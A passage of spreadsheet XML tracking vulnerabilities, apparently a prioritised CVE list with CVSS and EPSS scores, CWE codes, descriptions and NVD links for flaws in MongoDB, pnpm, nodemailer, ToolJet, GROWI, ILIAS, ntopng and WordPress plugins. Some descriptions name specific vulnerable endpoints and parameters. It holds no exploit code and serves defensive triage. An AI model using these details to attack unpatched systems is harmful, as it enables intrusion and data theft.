          <t>A security issue in the MongoDB Server's storage engine integration layer allows an authenticated user with collection creation privileges to cause a persistent denial of service. Insufficient validation of user-supplied storage configuration options permits values that, once persisted to durable metadata, trigger a fatal assertion failure when the metadata is subsequently read by diagnostic operations. The corrupted metadata persists across server restarts and is replicated to other cluster members, requiring manual operator intervention to restore service.</t>
        </is>
      </c>
      <c r="M3260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82065</t>
        </is>
      </c>
    </row>
    <row r="3261">
      <c r="A3261" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82068</t>
        </is>
      </c>
      <c r="C3261" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3261" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3261" s="5" t="inlineStr"/>
      <c r="F3261" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3261" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3261" s="5" t="inlineStr"/>
      <c r="I3261" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3261" s="5" t="inlineStr"/>
      <c r="K3261" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="L3261" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server allows an authenticated user with write privileges to trigger a persistent fatal assertion crash by sending specially crafted retryable write commands. The crash state is durably persisted, causing the server process to repeatedly crash on restart and potentially propagating to additional nodes in a sharded cluster. Manual intervention is required to restore service availability.</t>
        </is>
      </c>
      <c r="M3261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82068</t>
        </is>
      </c>
    </row>
    <row r="3262">
      <c r="A3262" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82070</t>
        </is>
      </c>
      <c r="C3262" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3262" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3262" s="5" t="inlineStr"/>
      <c r="F3262" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3262" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3262" s="5" t="inlineStr"/>
      <c r="I3262" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3262" s="5" t="inlineStr"/>
      <c r="K3262" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L3262" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server's diagnostic reporting interface allows an authenticated user with monitoring privileges to access insufficiently protected credentials from concurrent administrative operations. The same credentials are properly redacted in server log output, but the diagnostic interface omits equivalent redaction. Successful exploitation requires a valid authenticated session with monitoring-level permissions and results in exposure of cleartext credentials that could enable impersonation of other users, including privileged accounts.</t>
        </is>
      </c>
      <c r="M3262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82070</t>
        </is>
      </c>
    </row>
    <row r="3263">
      <c r="A3263" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82073</t>
        </is>
      </c>
      <c r="C3263" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3263" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3263" s="5" t="inlineStr"/>
      <c r="F3263" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3263" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3263" s="5" t="inlineStr"/>
      <c r="I3263" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3263" s="5" t="inlineStr"/>
      <c r="K3263" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3263" s="5" t="inlineStr">
        <is>
          <t>A security issue in the MongoDB Server aggregation framework allows an authenticated user with limited read privileges to bypass view-level authorization checks and access data from unauthorized collections when Atlas Search features are in use. The issue stems from insufficient validation of an internal command parameter that can be set by external clients, causing a security check to be improperly skipped.</t>
        </is>
      </c>
      <c r="M3263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82073</t>
        </is>
      </c>
    </row>
    <row r="3264">
      <c r="A3264" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82074</t>
        </is>
      </c>
      <c r="C3264" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3264" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3264" s="5" t="inlineStr"/>
      <c r="F3264" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3264" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3264" s="5" t="inlineStr"/>
      <c r="I3264" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3264" s="5" t="inlineStr"/>
      <c r="K3264" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3264" s="5" t="inlineStr">
        <is>
          <t>MongoDB Server contains an incorrect authorization vulnerability in the aggregation framework. An authenticated user with minimal privileges can craft a specially formatted aggregation request that causes the server's authorization subsystem to evaluate a different operation than what is actually executed, resulting in unauthorized read access to collection data within the target database.</t>
        </is>
      </c>
      <c r="M3264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82074</t>
        </is>
      </c>
    </row>
    <row r="3265">
      <c r="A3265" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82076</t>
        </is>
      </c>
      <c r="C3265" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3265" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3265" s="5" t="inlineStr"/>
      <c r="F3265" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3265" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3265" s="5" t="inlineStr"/>
      <c r="I3265" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3265" s="5" t="inlineStr"/>
      <c r="K3265" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L3265" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M3265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82076</t>
        </is>
      </c>
    </row>
    <row r="3266">
      <c r="A3266" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82392</t>
        </is>
      </c>
      <c r="C3266" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3266" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3266" s="5" t="inlineStr"/>
      <c r="F3266" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3266" s="5" t="inlineStr"/>
      <c r="H3266" s="5" t="inlineStr"/>
      <c r="I3266" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J3266" s="5" t="inlineStr"/>
      <c r="K3266" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3266" s="5" t="inlineStr">
        <is>
          <t>pnpm is a package manager. Prior to 10.34.5 and from 11.0.0 until 11.11.0, pnpm parses the package name from attacker-controlled pnpm-lock.yaml packages keys with dp.parse(depPath).name and uses it without validation in deps/graph-builder/src/lockfileToDepGraph.ts and pnpm11/deps/graph-builder/src/lockfileToDepGraph.ts. The name reaches path.join(modules, pkgName), storeController.importPackage, and pnpm11/lockfile/to-pnp/src/index.ts, allowing package contents to be written outside node_modules when a user runs pnpm install. When dangerouslyAllowAllBuilds or a matching allowBuilds entry permits lifecycle scripts, the escaped package can execute code with the user's privileges. This issue is fixed in versions 10.34.5 and 11.11.0.</t>
        </is>
      </c>
      <c r="M3266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82392</t>
        </is>
      </c>
    </row>
    <row r="3267">
      <c r="A3267" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82634</t>
        </is>
      </c>
      <c r="C3267" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3267" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3267" s="5" t="inlineStr"/>
      <c r="F3267" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3267" s="5" t="inlineStr"/>
      <c r="H3267" s="5" t="inlineStr"/>
      <c r="I3267" s="5" t="inlineStr">
        <is>
          <t>2026-08-30</t>
        </is>
      </c>
      <c r="J3267" s="5" t="inlineStr"/>
      <c r="K3267" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3267" s="5" t="inlineStr">
        <is>
          <t>Frappe Framework development builds contain an authorization flaw in the render_jinja_template endpoint that allows low-privileged users to render arbitrary Jinja templates by supplying raw template strings. Attackers with print permission on any document can execute arbitrary SELECT statements against unrelated tables, including reading password hashes from the __Auth table.</t>
        </is>
      </c>
      <c r="M3267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82634</t>
        </is>
      </c>
    </row>
    <row r="3268">
      <c r="A3268" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82659</t>
        </is>
      </c>
      <c r="C3268" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3268" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3268" s="5" t="inlineStr"/>
      <c r="F3268" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3268" s="5" t="inlineStr"/>
      <c r="H3268" s="5" t="inlineStr"/>
      <c r="I3268" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J3268" s="5" t="inlineStr"/>
      <c r="K3268" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L3268" s="5" t="inlineStr">
        <is>
          <t>nodemailer before 9.0.1 fails to apply disableFileAccess and disableUrlAccess flags to message-level raw option, allowing authenticated attackers to read arbitrary files or perform server-side request forgery by supplying path or href properties. Attackers can exploit this by crafting raw messages with file paths or URLs that bypass the intended sandbox, with fetched content delivered in the outgoing message to attacker-controlled recipients.</t>
        </is>
      </c>
      <c r="M3268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82659</t>
        </is>
      </c>
    </row>
    <row r="3269">
      <c r="A3269" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82864</t>
        </is>
      </c>
      <c r="C3269" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3269" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3269" s="5" t="inlineStr"/>
      <c r="F3269" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3269" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H3269" s="5" t="inlineStr"/>
      <c r="I3269" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J3269" s="5" t="inlineStr"/>
      <c r="K3269" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L3269" s="5" t="inlineStr">
        <is>
          <t>pdfme pdf-lib versions before 5.5.10 contain an unbounded buffer growth vulnerability in the DecodeStream.ensureBuffer() method that allows attackers to cause denial of service by supplying a crafted PDF with a FlateDecode stream containing a decompression bomb. Attackers can upload a small compressed PDF that decompresses to hundreds of megabytes, exhausting memory and crashing the Node.js process or freezing browser tabs during PDF parsing.</t>
        </is>
      </c>
      <c r="M3269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82864</t>
        </is>
      </c>
    </row>
    <row r="3270">
      <c r="A3270" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82872</t>
        </is>
      </c>
      <c r="C3270" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3270" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3270" s="5" t="inlineStr"/>
      <c r="F3270" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3270" s="5" t="inlineStr"/>
      <c r="H3270" s="5" t="inlineStr"/>
      <c r="I3270" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J3270" s="5" t="inlineStr"/>
      <c r="K3270" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3270" s="5" t="inlineStr">
        <is>
          <t>ToolJet before v3.16.208 fails to validate that the path organizationId matches the authenticated user's workspace before performing ToolJet DB table operations. A workspace admin can create, view, and delete database tables in another workspace by replacing the organizationId parameter in table-management API requests.</t>
        </is>
      </c>
      <c r="M3270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82872</t>
        </is>
      </c>
    </row>
    <row r="3271">
      <c r="A3271" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82877</t>
        </is>
      </c>
      <c r="C3271" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3271" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3271" s="5" t="inlineStr"/>
      <c r="F3271" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3271" s="5" t="inlineStr"/>
      <c r="H3271" s="5" t="inlineStr"/>
      <c r="I3271" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J3271" s="5" t="inlineStr"/>
      <c r="K3271" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3271" s="5" t="inlineStr">
        <is>
          <t>ILIAS before versions 9.22, 10.10, and 11.3 contains an arbitrary file read vulnerability in the SOAP addFile method that allows authenticated users to read server files by supplying crafted XML with COPY-mode imports. Attackers can construct absolute file paths through an unsandboxed import directory and retrieve sensitive files including configuration files containing database credentials and setup passwords.</t>
        </is>
      </c>
      <c r="M3271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82877</t>
        </is>
      </c>
    </row>
    <row r="3272">
      <c r="A3272" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83961</t>
        </is>
      </c>
      <c r="C3272" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3272" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3272" s="5" t="inlineStr"/>
      <c r="F3272" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3272" s="5" t="inlineStr"/>
      <c r="H3272" s="5" t="inlineStr">
        <is>
          <t>adobe:coldfusion</t>
        </is>
      </c>
      <c r="I3272" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3272" s="5" t="inlineStr"/>
      <c r="K3272" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L3272" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by an Improper Authentication vulnerability that could result in privilege escalation. An attacker could leverage this vulnerability to gain limited read and write access. The vulnerable component is restricted to an administrative network zone by default. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="M3272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83961</t>
        </is>
      </c>
    </row>
    <row r="3273">
      <c r="A3273" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84192</t>
        </is>
      </c>
      <c r="C3273" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3273" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3273" s="5" t="inlineStr"/>
      <c r="F3273" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3273" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3273" s="5" t="inlineStr"/>
      <c r="I3273" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J3273" s="5" t="inlineStr"/>
      <c r="K3273" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3273" s="5" t="inlineStr">
        <is>
          <t>LibreNMS before 26.3.1 contains a stored cross-site scripting vulnerability in legacy PHP templates that output SNMP-sourced and syslog-sourced data without escaping. An attacker who controls a monitored network device can inject arbitrary JavaScript through SNMP interface descriptions or syslog program fields that executes when authenticated users view affected pages.</t>
        </is>
      </c>
      <c r="M3273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84192</t>
        </is>
      </c>
    </row>
    <row r="3274">
      <c r="A3274" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84204</t>
        </is>
      </c>
      <c r="C3274" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3274" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3274" s="5" t="inlineStr"/>
      <c r="F3274" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3274" s="5" t="inlineStr"/>
      <c r="H3274" s="5" t="inlineStr"/>
      <c r="I3274" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J3274" s="5" t="inlineStr"/>
      <c r="K3274" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3274" s="5" t="inlineStr">
        <is>
          <t>GROWI contains an access control vulnerability in the GET /_api/v3/attachment/:id endpoint that fails to validate page access permissions. Authenticated attackers can retrieve attachment metadata from pages they cannot view by supplying known attachment identifiers.</t>
        </is>
      </c>
      <c r="M3274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84204</t>
        </is>
      </c>
    </row>
    <row r="3275">
      <c r="A3275" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84205</t>
        </is>
      </c>
      <c r="C3275" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3275" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3275" s="5" t="inlineStr"/>
      <c r="F3275" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3275" s="5" t="inlineStr"/>
      <c r="H3275" s="5" t="inlineStr"/>
      <c r="I3275" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J3275" s="5" t="inlineStr"/>
      <c r="K3275" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3275" s="5" t="inlineStr">
        <is>
          <t>GROWI contains an access control vulnerability in the GET /_api/v3/revisions/:id endpoint that validates access against a query parameter but returns the revision identified by the path parameter without confirming they reference the same page. Authenticated attackers can pair a page identifier they can access with an arbitrary revision identifier to read revision content from pages they lack permission to view.</t>
        </is>
      </c>
      <c r="M3275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84205</t>
        </is>
      </c>
    </row>
    <row r="3276">
      <c r="A3276" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84698</t>
        </is>
      </c>
      <c r="C3276" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3276" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3276" s="5" t="inlineStr"/>
      <c r="F3276" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3276" s="5" t="inlineStr"/>
      <c r="H3276" s="5" t="inlineStr"/>
      <c r="I3276" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J3276" s="5" t="inlineStr"/>
      <c r="K3276" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L3276" s="5" t="inlineStr">
        <is>
          <t>PX4 Autopilot contains a heap buffer overflow vulnerability in the sd_bench command that writes a four-byte block number into a user-supplied sized allocation. Attackers can invoke sd_bench with a block size below four bytes to overflow the heap buffer and potentially execute code or crash the system.</t>
        </is>
      </c>
      <c r="M3276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84698</t>
        </is>
      </c>
    </row>
    <row r="3277">
      <c r="A3277" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84816</t>
        </is>
      </c>
      <c r="C3277" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3277" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3277" s="5" t="inlineStr"/>
      <c r="F3277" s="5" t="inlineStr"/>
      <c r="G3277" s="5" t="inlineStr"/>
      <c r="H3277" s="5" t="inlineStr"/>
      <c r="I3277" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3277" s="5" t="inlineStr"/>
      <c r="K3277" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3277" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in WPCS &lt;= 1.3.2 versions.</t>
        </is>
      </c>
      <c r="M3277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84816</t>
        </is>
      </c>
    </row>
    <row r="3278">
      <c r="A3278" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84817</t>
        </is>
      </c>
      <c r="C3278" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3278" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3278" s="5" t="inlineStr"/>
      <c r="F3278" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3278" s="5" t="inlineStr"/>
      <c r="H3278" s="5" t="inlineStr"/>
      <c r="I3278" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3278" s="5" t="inlineStr"/>
      <c r="K3278" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3278" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in JetFormBuilder &lt;= 3.6.5.1 versions.</t>
        </is>
      </c>
      <c r="M3278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84817</t>
        </is>
      </c>
    </row>
    <row r="3279">
      <c r="A3279" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84818</t>
        </is>
      </c>
      <c r="C3279" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3279" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3279" s="5" t="inlineStr"/>
      <c r="F3279" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3279" s="5" t="inlineStr"/>
      <c r="H3279" s="5" t="inlineStr"/>
      <c r="I3279" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3279" s="5" t="inlineStr"/>
      <c r="K3279" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3279" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Open User Map &lt;= 1.4.50 versions.</t>
        </is>
      </c>
      <c r="M3279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84818</t>
        </is>
      </c>
    </row>
    <row r="3280">
      <c r="A3280" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84819</t>
        </is>
      </c>
      <c r="C3280" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3280" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3280" s="5" t="inlineStr"/>
      <c r="F3280" s="5" t="inlineStr"/>
      <c r="G3280" s="5" t="inlineStr"/>
      <c r="H3280" s="5" t="inlineStr"/>
      <c r="I3280" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3280" s="5" t="inlineStr"/>
      <c r="K3280" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3280" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in WPAdverts &lt;= 2.3.3 versions.</t>
        </is>
      </c>
      <c r="M3280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84819</t>
        </is>
      </c>
    </row>
    <row r="3281">
      <c r="A3281" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84820</t>
        </is>
      </c>
      <c r="C3281" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3281" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3281" s="5" t="inlineStr"/>
      <c r="F3281" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3281" s="5" t="inlineStr"/>
      <c r="H3281" s="5" t="inlineStr"/>
      <c r="I3281" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3281" s="5" t="inlineStr"/>
      <c r="K3281" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3281" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Unlimited Elements For Elementor (Free Widgets, Addons, Templates) &lt;= 2.0.17 versions.</t>
        </is>
      </c>
      <c r="M3281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84820</t>
        </is>
      </c>
    </row>
    <row r="3282">
      <c r="A3282" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84989</t>
        </is>
      </c>
      <c r="C3282" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3282" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3282" s="5" t="inlineStr"/>
      <c r="F3282" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3282" s="5" t="inlineStr"/>
      <c r="H3282" s="5" t="inlineStr"/>
      <c r="I3282" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3282" s="5" t="inlineStr"/>
      <c r="K3282" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3282" s="5" t="inlineStr">
        <is>
          <t>ntopng is a web-based network traffic monitoring application. In versions 6.7.0 through 6.7.260717, two REST v2 endpoints that manage ntopng's tag/badge feature — `POST /lua/rest/v2/delete/tag/tag.lua` and `POST /lua/rest/v2/edit/tag/tag.lua` — perform no authorization check at all. Any authenticated user, including a non-administrator ("unprivileged") account, can delete or rename any tag in the system, including tags created by an administrator. Version 6.7.260718 contains a fix.</t>
        </is>
      </c>
      <c r="M3282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84989</t>
        </is>
      </c>
    </row>
    <row r="3283">
